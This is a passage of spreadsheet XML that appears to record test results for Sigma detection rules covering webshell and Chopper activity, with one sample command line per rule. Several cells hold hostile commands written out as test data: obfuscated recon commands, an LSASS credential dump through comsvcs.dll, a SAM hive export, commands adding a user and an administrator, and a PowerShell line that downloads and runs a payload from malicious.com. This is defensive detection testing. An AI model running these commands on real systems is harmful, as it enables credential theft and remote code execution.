      <c r="G40" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H40" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I40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0" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K40" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="41" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A41" s="43" t="n"/>
      <c r="B41" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_recon_commands_and_processes</t>
        </is>
      </c>
      <c r="C41" s="36" t="inlineStr">
        <is>
          <t>Webshell Detection With Command Line Keywords</t>
        </is>
      </c>
      <c r="D41" s="36" t="inlineStr">
        <is>
          <t>bed2a484-9348-4143-8a8a-b801c979301c</t>
        </is>
      </c>
      <c r="E41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41" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G41" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H41" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I41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1" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K41" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="42" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A42" s="43" t="n"/>
      <c r="B42" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_recon_commands_and_processes</t>
        </is>
      </c>
      <c r="C42" s="36" t="inlineStr">
        <is>
          <t>Webshell Detection With Command Line Keywords</t>
        </is>
      </c>
      <c r="D42" s="36" t="inlineStr">
        <is>
          <t>bed2a484-9348-4143-8a8a-b801c979301c</t>
        </is>
      </c>
      <c r="E42" s="36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F42" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G42" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H42" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I42" s="43" t="n"/>
      <c r="J42" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K42" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="43" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A43" s="43" t="n"/>
      <c r="B43" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_recon_commands_and_processes</t>
        </is>
      </c>
      <c r="C43" s="36" t="inlineStr">
        <is>
          <t>Webshell Detection With Command Line Keywords</t>
        </is>
      </c>
      <c r="D43" s="36" t="inlineStr">
        <is>
          <t>bed2a484-9348-4143-8a8a-b801c979301c</t>
        </is>
      </c>
      <c r="E43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43" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G43" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H43" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I43" s="43" t="n"/>
      <c r="J43" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K43" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="44" hidden="1" ht="15.75" customHeight="1" s="42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</row>
    <row r="45" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A45" s="36" t="inlineStr">
        <is>
          <t>t1021.001</t>
        </is>
      </c>
      <c r="B45" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_add_user_remote_desktop_group</t>
        </is>
      </c>
      <c r="C45" s="36" t="inlineStr">
        <is>
          <t>User Added to Remote Desktop Users Group</t>
        </is>
      </c>
      <c r="D45" s="36" t="inlineStr">
        <is>
          <t>ffa28e60-bdb1-46e0-9f82-05f7a61cc06e</t>
        </is>
      </c>
      <c r="E45" s="43" t="n"/>
      <c r="F45" s="43" t="n"/>
      <c r="G45" s="43" t="n"/>
      <c r="H45" s="43" t="n"/>
      <c r="I45" s="43" t="n"/>
      <c r="J45" s="43" t="n"/>
      <c r="K45" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="46" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A46" s="43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</row>
    <row r="47" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A47" s="36" t="inlineStr">
        <is>
          <t>t1021.002</t>
        </is>
      </c>
      <c r="B47" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_net_use_password_plaintext</t>
        </is>
      </c>
      <c r="C47" s="36" t="inlineStr">
        <is>
          <t>Password Provided In Command Line Of Net.EXE</t>
        </is>
      </c>
      <c r="D47" s="36" t="inlineStr">
        <is>
          <t>d4498716-1d52-438f-8084-4a603157d131</t>
        </is>
      </c>
      <c r="E47" s="43" t="n"/>
      <c r="F47" s="43" t="n"/>
      <c r="G47" s="43" t="n"/>
      <c r="H47" s="43" t="n"/>
      <c r="I47" s="43" t="n"/>
      <c r="J47" s="43" t="n"/>
      <c r="K47" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="48" hidden="1" ht="15.75" customHeight="1" s="42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</row>
    <row r="49" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A49" s="36" t="inlineStr">
        <is>
          <t>t1033</t>
        </is>
      </c>
      <c r="B49" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_chopper</t>
        </is>
      </c>
      <c r="C49" s="36" t="inlineStr">
        <is>
          <t>Chopper Webshell Process Pattern</t>
        </is>
      </c>
      <c r="D49" s="36" t="inlineStr">
        <is>
          <t>fa3c117a-bc0d-416e-a31b-0c0e80653efb</t>
        </is>
      </c>
      <c r="E49" s="36" t="inlineStr">
        <is>
          <t>cmd.exe /c "&amp; ipconfig &amp; echo"</t>
        </is>
      </c>
      <c r="F49" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G49" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H49" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I49" s="43" t="n"/>
      <c r="J49" s="36" t="n">
        <v>1</v>
      </c>
      <c r="K49" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="50" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A50" s="36" t="inlineStr">
        <is>
          <t>t1033</t>
        </is>
      </c>
      <c r="B50" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_chopper</t>
        </is>
      </c>
      <c r="C50" s="36" t="inlineStr">
        <is>
          <t>Chopper Webshell Process Pattern</t>
        </is>
      </c>
      <c r="D50" s="36" t="inlineStr">
        <is>
          <t>fa3c117a-bc0d-416e-a31b-0c0e80653efb</t>
        </is>
      </c>
      <c r="E50" s="36" t="inlineStr">
        <is>
          <t>cmd.exe /c "&amp;dir&amp;&amp;echo [E]"</t>
        </is>
      </c>
      <c r="F50" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G50" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H50" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I50" s="43" t="n"/>
      <c r="J50" s="36" t="n">
        <v>1</v>
      </c>
      <c r="K50" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="51" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A51" s="36" t="inlineStr">
        <is>
          <t>t1033</t>
        </is>
      </c>
      <c r="B51" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_chopper</t>
        </is>
      </c>
      <c r="C51" s="36" t="inlineStr">
        <is>
          <t>Chopper Webshell Process Pattern</t>
        </is>
      </c>
      <c r="D51" s="36" t="inlineStr">
        <is>
          <t>fa3c117a-bc0d-416e-a31b-0c0e80653efb</t>
        </is>
      </c>
      <c r="E51" s="36" t="inlineStr">
        <is>
          <t>cmd.exe /c "whoami &amp; echo [E]"</t>
        </is>
      </c>
      <c r="F51" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G51" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H51" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I51" s="43" t="n"/>
      <c r="J51" s="36" t="n">
        <v>1</v>
      </c>
      <c r="K51" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="52" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A52" s="36" t="inlineStr">
        <is>
          <t>t1033</t>
        </is>
      </c>
      <c r="B52" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_chopper</t>
        </is>
      </c>
      <c r="C52" s="36" t="inlineStr">
        <is>
          <t>Chopper Webshell Process Pattern</t>
        </is>
      </c>
      <c r="D52" s="36" t="inlineStr">
        <is>
          <t>fa3c117a-bc0d-416e-a31b-0c0e80653efb</t>
        </is>
      </c>
      <c r="E52" s="36" t="inlineStr">
        <is>
          <t>cmd.exe /c w^hoami&amp;echo [S]</t>
        </is>
      </c>
      <c r="F52" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G52" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H52" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I52" s="36" t="inlineStr">
        <is>
          <t>Local Accounts Discovery (502b42de-4306-40b4-9596-6f590c81f073); Whoami Utility Execution (e28a5a99-da44-436d-b7a0-2afc20a5f413)</t>
        </is>
      </c>
      <c r="J52" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K52" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="53" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A53" s="43" t="inlineStr">
        <is>
          <t>t1505.002</t>
        </is>
      </c>
      <c r="B53" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_msexchange_transport_agent</t>
        </is>
      </c>
      <c r="C53" s="36" t="inlineStr">
        <is>
          <t>MSExchange Transport Agent Installation</t>
        </is>
      </c>
      <c r="D53" s="36" t="inlineStr">
        <is>
          <t>83809e84-4475-4b69-bc3e-4aad8568612f</t>
        </is>
      </c>
      <c r="E53" s="36" t="inlineStr">
        <is>
          <t>"powershell.exe" &amp; {Invoke-Expression ('Install-' + 'TransportAgent -Name Security Interop Agent -TransportAgentFactory Microsoft.Exchange.Security.Interop.SecurityInteropAgentFactory -AssemblyPath c:\program files\microsoft\Exchange Server\v15_x0008_in\Microsoft.Exchange.Security.Interop.dll')}</t>
        </is>
      </c>
      <c r="F53" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G53" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H53" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I53" s="43" t="n"/>
      <c r="J53" s="36" t="n">
        <v>2</v>
      </c>
      <c r="K53" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="54" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A54" s="36" t="inlineStr">
        <is>
          <t>t1033</t>
        </is>
      </c>
      <c r="B54" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_chopper</t>
        </is>
      </c>
      <c r="C54" s="36" t="inlineStr">
        <is>
          <t>Chopper Webshell Process Pattern</t>
        </is>
      </c>
      <c r="D54" s="36" t="inlineStr">
        <is>
          <t>fa3c117a-bc0d-416e-a31b-0c0e80653efb</t>
        </is>
      </c>
      <c r="E54" s="36" t="inlineStr">
        <is>
          <t>cmd.exe /C w^hoami&amp;echo [S]</t>
        </is>
      </c>
      <c r="F54" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G54" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H54" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I54" s="36" t="inlineStr">
        <is>
          <t>Local Accounts Discovery (502b42de-4306-40b4-9596-6f590c81f073); Whoami Utility Execution (e28a5a99-da44-436d-b7a0-2afc20a5f413)</t>
        </is>
      </c>
      <c r="J54" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K54" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="55" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A55" s="36" t="inlineStr">
        <is>
          <t>t1033</t>
        </is>
      </c>
      <c r="B55" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_chopper</t>
        </is>
      </c>
      <c r="C55" s="36" t="inlineStr">
        <is>
          <t>Chopper Webshell Process Pattern</t>
        </is>
      </c>
      <c r="D55" s="36" t="inlineStr">
        <is>
          <t>fa3c117a-bc0d-416e-a31b-0c0e80653efb</t>
        </is>
      </c>
      <c r="E55" s="36" t="inlineStr">
        <is>
          <t>cmd.exe /c "&amp;wh^oami&amp;ec^ho"</t>
        </is>
      </c>
      <c r="F55" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G55" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H55" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I55" s="43" t="n"/>
      <c r="J55" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K55" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="56" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A56" s="43" t="n"/>
      <c r="B56" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_chopper</t>
        </is>
      </c>
      <c r="C56" s="36" t="inlineStr">
        <is>
          <t>Chopper Webshell Process Pattern</t>
        </is>
      </c>
      <c r="D56" s="36" t="inlineStr">
        <is>
          <t>fa3c117a-bc0d-416e-a31b-0c0e80653efb</t>
        </is>
      </c>
      <c r="E56" s="36" t="inlineStr">
        <is>
          <t>cmd.exe /c "&amp; ipconfig &amp; echo"</t>
        </is>
      </c>
      <c r="F56" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G56" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H56" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I56" s="43" t="n"/>
      <c r="J56" s="36" t="n">
        <v>1</v>
      </c>
      <c r="K56" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="57" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A57" s="43" t="n"/>
      <c r="B57" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_hacking</t>
        </is>
      </c>
      <c r="C57" s="36" t="inlineStr">
        <is>
          <t>Webshell Hacking Activity Patterns</t>
        </is>
      </c>
      <c r="D57" s="36" t="inlineStr">
        <is>
          <t>4ebc877f-4612-45cb-b3a5-8e3834db36c9</t>
        </is>
      </c>
      <c r="E57" s="36" t="inlineStr">
        <is>
          <t>cmd.exe /c r^undll32.exe C:\Windows\System32\com^svcs.dll, MiniDump 600 C:\lsass.dmp full</t>
        </is>
      </c>
      <c r="F57" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G57" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H57" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I57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57" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K57" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="58" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A58" s="43" t="n"/>
      <c r="B58" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_hacking</t>
        </is>
      </c>
      <c r="C58" s="36" t="inlineStr">
        <is>
          <t>Webshell Hacking Activity Patterns</t>
        </is>
      </c>
      <c r="D58" s="36" t="inlineStr">
        <is>
          <t>4ebc877f-4612-45cb-b3a5-8e3834db36c9</t>
        </is>
      </c>
      <c r="E58" s="36" t="inlineStr">
        <is>
          <t>cmd.exe /C r^undll32.exe C:\Windows\System32\com^svcs.dll, MiniDump 600 C:\lsass.dmp full</t>
        </is>
      </c>
      <c r="F58" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G58" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H58" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I58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58" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K58" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="59" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A59" s="43" t="n"/>
      <c r="B59" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_hacking</t>
        </is>
      </c>
      <c r="C59" s="36" t="inlineStr">
        <is>
          <t>Webshell Hacking Activity Patterns</t>
        </is>
      </c>
      <c r="D59" s="36" t="inlineStr">
        <is>
          <t>4ebc877f-4612-45cb-b3a5-8e3834db36c9</t>
        </is>
      </c>
      <c r="E59" s="36" t="inlineStr">
        <is>
          <t>cmd.exe /"c" r^undll32.exe C:\Windows\System32\com^svcs.dll, MiniDump 600 C:\lsass.dmp full</t>
        </is>
      </c>
      <c r="F59" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G59" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H59" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I59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59" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K59" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="60" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A60" s="43" t="n"/>
      <c r="B60" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_hacking</t>
        </is>
      </c>
      <c r="C60" s="36" t="inlineStr">
        <is>
          <t>Webshell Hacking Activity Patterns</t>
        </is>
      </c>
      <c r="D60" s="36" t="inlineStr">
        <is>
          <t>4ebc877f-4612-45cb-b3a5-8e3834db36c9</t>
        </is>
      </c>
      <c r="E60" s="36" t="inlineStr">
        <is>
          <t>cmd.exe -"c" r^undll32.exe C:\Windows\System32\com^svcs.dll, MiniDump 600 C:\lsass.dmp full</t>
        </is>
      </c>
      <c r="F60" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G60" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H60" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I60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60" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K60" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="61" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A61" s="43" t="n"/>
      <c r="B61" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_chopper</t>
        </is>
      </c>
      <c r="C61" s="36" t="inlineStr">
        <is>
          <t>Chopper Webshell Process Pattern</t>
        </is>
      </c>
      <c r="D61" s="36" t="inlineStr">
        <is>
          <t>fa3c117a-bc0d-416e-a31b-0c0e80653efb</t>
        </is>
      </c>
      <c r="E61" s="36" t="inlineStr">
        <is>
          <t>cmd.exe /c "&amp;wh^oami&amp;echo"</t>
        </is>
      </c>
      <c r="F61" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G61" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H61" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I61" s="43" t="n"/>
      <c r="J61" s="36" t="n">
        <v>1</v>
      </c>
      <c r="K61" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="62" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A62" s="43" t="n"/>
      <c r="B62" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_chopper</t>
        </is>
      </c>
      <c r="C62" s="36" t="inlineStr">
        <is>
          <t>Chopper Webshell Process Pattern</t>
        </is>
      </c>
      <c r="D62" s="36" t="inlineStr">
        <is>
          <t>fa3c117a-bc0d-416e-a31b-0c0e80653efb</t>
        </is>
      </c>
      <c r="E62" s="36" t="inlineStr">
        <is>
          <t>cmd.exe /c "whoami &amp; echo [E]"</t>
        </is>
      </c>
      <c r="F62" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G62" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H62" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I62" s="43" t="n"/>
      <c r="J62" s="36" t="n">
        <v>1</v>
      </c>
      <c r="K62" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="63" ht="15.75" customHeight="1" s="42">
      <c r="A63" s="43" t="n"/>
      <c r="B63" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_recon_commands_and_processes</t>
        </is>
      </c>
      <c r="C63" s="36" t="inlineStr">
        <is>
          <t>Webshell Detection With Command Line Keywords</t>
        </is>
      </c>
      <c r="D63" s="36" t="inlineStr">
        <is>
          <t>bed2a484-9348-4143-8a8a-b801c979301c</t>
        </is>
      </c>
      <c r="E63" s="36" t="inlineStr">
        <is>
          <t>powershell.exe /"ec" JAB0AD0AMQA=</t>
        </is>
      </c>
      <c r="F63" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G63" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H63" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I63" s="43" t="n"/>
      <c r="J63" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K63" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="64" ht="15.75" customHeight="1" s="42">
      <c r="A64" s="43" t="n"/>
      <c r="B64" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_hacking</t>
        </is>
      </c>
      <c r="C64" s="36" t="inlineStr">
        <is>
          <t>Webshell Hacking Activity Patterns</t>
        </is>
      </c>
      <c r="D64" s="36" t="inlineStr">
        <is>
          <t>4ebc877f-4612-45cb-b3a5-8e3834db36c9</t>
        </is>
      </c>
      <c r="E64" s="36" t="inlineStr">
        <is>
          <t>cmd.exe /c "n^e^t u^s^e^r t^e^s^t^u^s^e^r P^a^s^s^w^o^r^d /a^d^d"</t>
        </is>
      </c>
      <c r="F64" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G64" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H64" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I64" s="43" t="n"/>
      <c r="J64" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K64" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="65" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A65" s="43" t="n"/>
      <c r="B65" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_hacking</t>
        </is>
      </c>
      <c r="C65" s="36" t="inlineStr">
        <is>
          <t>Webshell Hacking Activity Patterns</t>
        </is>
      </c>
      <c r="D65" s="36" t="inlineStr">
        <is>
          <t>4ebc877f-4612-45cb-b3a5-8e3834db36c9</t>
        </is>
      </c>
      <c r="E65" s="36" t="inlineStr">
        <is>
          <t>copy C:\Windows\System32\comsvcs.dll C:\Windows\Temp\c.dll &amp;&amp; rundll32.exe C:\Windows\Temp\c.dll, MiniDump 500 lsass.bin</t>
        </is>
      </c>
      <c r="F65" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G65" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H65" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I65" s="36" t="inlineStr">
        <is>
          <t>Potentially Suspicious Rundll32 Activity (e593cf51-88db-4ee1-b920-37e89012a3c9); Suspicious Copy From or To System Directory (fff9d2b7-e11c-4a69-93d3-40ef66189767)</t>
        </is>
      </c>
      <c r="J65" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K65" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="66" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A66" s="36" t="inlineStr">
        <is>
          <t>t1018</t>
        </is>
      </c>
      <c r="B66" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_chopper</t>
        </is>
      </c>
      <c r="C66" s="36" t="inlineStr">
        <is>
          <t>Chopper Webshell Process Pattern</t>
        </is>
      </c>
      <c r="D66" s="36" t="inlineStr">
        <is>
          <t>fa3c117a-bc0d-416e-a31b-0c0e80653efb</t>
        </is>
      </c>
      <c r="E66" s="36" t="inlineStr">
        <is>
          <t>cmd.exe /"c" w^hoami&amp;echo [S]</t>
        </is>
      </c>
      <c r="F66" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G66" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H66" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I66" s="43" t="n"/>
      <c r="J66" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K66" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="67" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A67" s="36" t="inlineStr">
        <is>
          <t>t1018</t>
        </is>
      </c>
      <c r="B67" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_chopper</t>
        </is>
      </c>
      <c r="C67" s="36" t="inlineStr">
        <is>
          <t>Chopper Webshell Process Pattern</t>
        </is>
      </c>
      <c r="D67" s="36" t="inlineStr">
        <is>
          <t>fa3c117a-bc0d-416e-a31b-0c0e80653efb</t>
        </is>
      </c>
      <c r="E67" s="36" t="inlineStr">
        <is>
          <t>cmd.exe -"c" w^hoami&amp;echo [S]</t>
        </is>
      </c>
      <c r="F67" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G67" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H67" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I67" s="43" t="n"/>
      <c r="J67" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K67" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="68" ht="15.75" customHeight="1" s="42">
      <c r="A68" s="43" t="n"/>
      <c r="B68" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_hacking</t>
        </is>
      </c>
      <c r="C68" s="36" t="inlineStr">
        <is>
          <t>Webshell Hacking Activity Patterns</t>
        </is>
      </c>
      <c r="D68" s="36" t="inlineStr">
        <is>
          <t>4ebc877f-4612-45cb-b3a5-8e3834db36c9</t>
        </is>
      </c>
      <c r="E68" s="36" t="inlineStr">
        <is>
          <t>powershell.exe /"Command" "Add-LocalGroupMember -Group 'Administrators' -Member 'testuser'"</t>
        </is>
      </c>
      <c r="F68" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G68" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H68" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I68" s="43" t="n"/>
      <c r="J68" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K68" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="69" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A69" s="36" t="inlineStr">
        <is>
          <t>t1018</t>
        </is>
      </c>
      <c r="B69" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_chopper</t>
        </is>
      </c>
      <c r="C69" s="36" t="inlineStr">
        <is>
          <t>Chopper Webshell Process Pattern</t>
        </is>
      </c>
      <c r="D69" s="36" t="inlineStr">
        <is>
          <t>fa3c117a-bc0d-416e-a31b-0c0e80653efb</t>
        </is>
      </c>
      <c r="E69" s="36" t="inlineStr">
        <is>
          <t>cmd.exe /"c" "&amp;wh^oami&amp;ec^ho"</t>
        </is>
      </c>
      <c r="F69" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G69" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H69" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I69" s="43" t="n"/>
      <c r="J69" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K69" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="70" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A70" s="43" t="n"/>
      <c r="B70" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_hacking</t>
        </is>
      </c>
      <c r="C70" s="36" t="inlineStr">
        <is>
          <t>Webshell Hacking Activity Patterns</t>
        </is>
      </c>
      <c r="D70" s="36" t="inlineStr">
        <is>
          <t>4ebc877f-4612-45cb-b3a5-8e3834db36c9</t>
        </is>
      </c>
      <c r="E70" s="36" t="inlineStr">
        <is>
          <t>cmd.exe /c reg s^ave HKLM\SAM C:\temp\sam.save</t>
        </is>
      </c>
      <c r="F70" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G70" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H70" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I70" s="43" t="n"/>
      <c r="J70" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K70" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="71" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A71" s="43" t="n"/>
      <c r="B71" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_hacking</t>
        </is>
      </c>
      <c r="C71" s="36" t="inlineStr">
        <is>
          <t>Webshell Hacking Activity Patterns</t>
        </is>
      </c>
      <c r="D71" s="36" t="inlineStr">
        <is>
          <t>4ebc877f-4612-45cb-b3a5-8e3834db36c9</t>
        </is>
      </c>
      <c r="E71" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -NoProfile -Command "Invoke-Expression (New-Object Net.WebClient).DownloadString('http://malicious.com/payload.ps1')"</t>
        </is>
      </c>
      <c r="F71" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G71" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H71" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I71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71" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K71" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="72" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A72" s="43" t="n"/>
      <c r="B72" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_hacking</t>
        </is>
      </c>
      <c r="C72" s="36" t="inlineStr">
        <is>
          <t>Webshell Hacking Activity Patterns</t>
        </is>
      </c>
      <c r="D72" s="36" t="inlineStr">
        <is>
          <t>4ebc877f-4612-45cb-b3a5-8e3834db36c9</t>
        </is>
      </c>
      <c r="E72" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -nop -cOmMaNd "Invoke-Expression (New-Object Net.WebClient).DownloadString('http://malicious.com/payload.ps1')"</t>
        </is>
      </c>
      <c r="F72" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G72" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H72" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I72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72" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K72" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="73" ht="15.75" customHeight="1" s="42">
